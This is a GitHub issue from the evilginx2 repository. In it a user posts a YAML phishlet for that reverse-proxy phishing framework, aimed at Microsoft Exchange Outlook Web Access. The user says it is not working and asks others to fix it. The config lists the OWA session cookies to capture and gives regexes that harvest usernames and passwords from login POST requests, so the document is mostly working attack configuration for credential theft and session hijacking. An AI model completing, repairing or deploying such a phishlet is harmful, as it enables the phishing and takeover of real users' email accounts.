### ISSUE TITLE
Created Exchange server phishlets but not working :( 

### ISSUE THREAD

**Issue by anir0y** [kgretzky/evilginx2#871]
# I attempted to create Exchange server Phishlet, and failed.

> if anyone know to make it work, you're more then welcome to correct me. 

code:

```yaml
name: 'Exchange'
author: '@anir0y'
min_ver: '2.3.0'

proxy_hosts:
  - {phish_sub: 'mail', orig_sub: 'mail', domain: 'exchangeserver.com', session: true, is_landing: true}


sub_filters:
  - {triggers_on: 'mail.exchangeserver.com', orig_sub: 'mail', domain: 'exchangeserver.com', search: '//{hostname}/owa/([0-9a-z]*)', replace: '//{hostname}/owa/${1}', mimes: ['text/html', 'application/json', 'application/javascript']}

auth_tokens:
- domain: 'mail.exchangeserver.com'
  keys: ['ClientId','PBack','PrivateComputer','UC','X-BackEndCookie','X-OWA-CANARY','X-OWA-JS-PSD','cadata','cadataIV','cadataKey','cadataSig','cadataTTL']

credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd|Password)'
    search: '(.*)'
    type: 'post'

login:
  domain: 'mail.exchangeserver.com'
  path: '/owa'
```
